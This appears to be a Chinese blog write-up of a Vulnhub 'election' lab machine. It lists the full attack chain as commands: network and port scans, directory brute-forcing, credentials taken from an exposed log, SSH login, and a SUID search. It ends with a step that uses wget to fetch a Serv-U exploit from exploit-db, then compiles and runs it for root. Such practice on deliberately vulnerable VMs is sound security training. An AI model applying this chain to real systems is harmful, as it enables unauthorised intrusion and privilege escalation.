今天實踐的是vulnhub的election鏡像,
下載地址,https://download.vulnhub.com/election/election.7z,
用virtualbox導入,做地址掃描,
sudo netdiscover -r 192.168.0.0/24,有地址了,192就是,

再繼續做端口掃描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.192,

有web服務,做一下目錄掃描,dirb http://192.168.0.192,

瀏覽器訪問http://192.168.0.192/robots.txt,

繼續做子目錄掃描,dirb http://192.168.0.192/election,

瀏覽器訪問http://192.168.0.192/election/admin/logs,

查看系統日志文件,獲取到用戶名密碼love/P@$$w0rd@123,

ssh登錄,ssh love@192.168.0.192,不是root,需要提權,

查找root權限的程序,find / -perm -u=s -type f 2>/dev/null,

網上搜索Serv-U Privilege Escalation,找到一個poc,

進入可寫目錄,cd /tmp,
下載源碼文件,wget https://www.exploit-db.com/download/47009,
改文件名,mv 47009 47009.c,編譯,gcc 47009.c -o poc,
執行,./poc,拿到新shell,確認是root,

本周的實踐完成,本周的實踐完成,本周的實踐完成,本周的實踐完成,本周的實踐完成,本周的實踐完成,本周的實踐完成,本周的實踐完成,本周的實踐完成,本周的實踐完成,本周的實踐完成,本周的實踐完成。
云計算和網絡安全技術實踐
云計算和網絡安全技術實踐
一顆小胡椒
一顆小胡椒
威努特工控安全
云計算和網絡安全技術實踐
云計算和網絡安全技術實踐
一顆小胡椒
betasec
Bypass
聚銘網絡
系統安全運維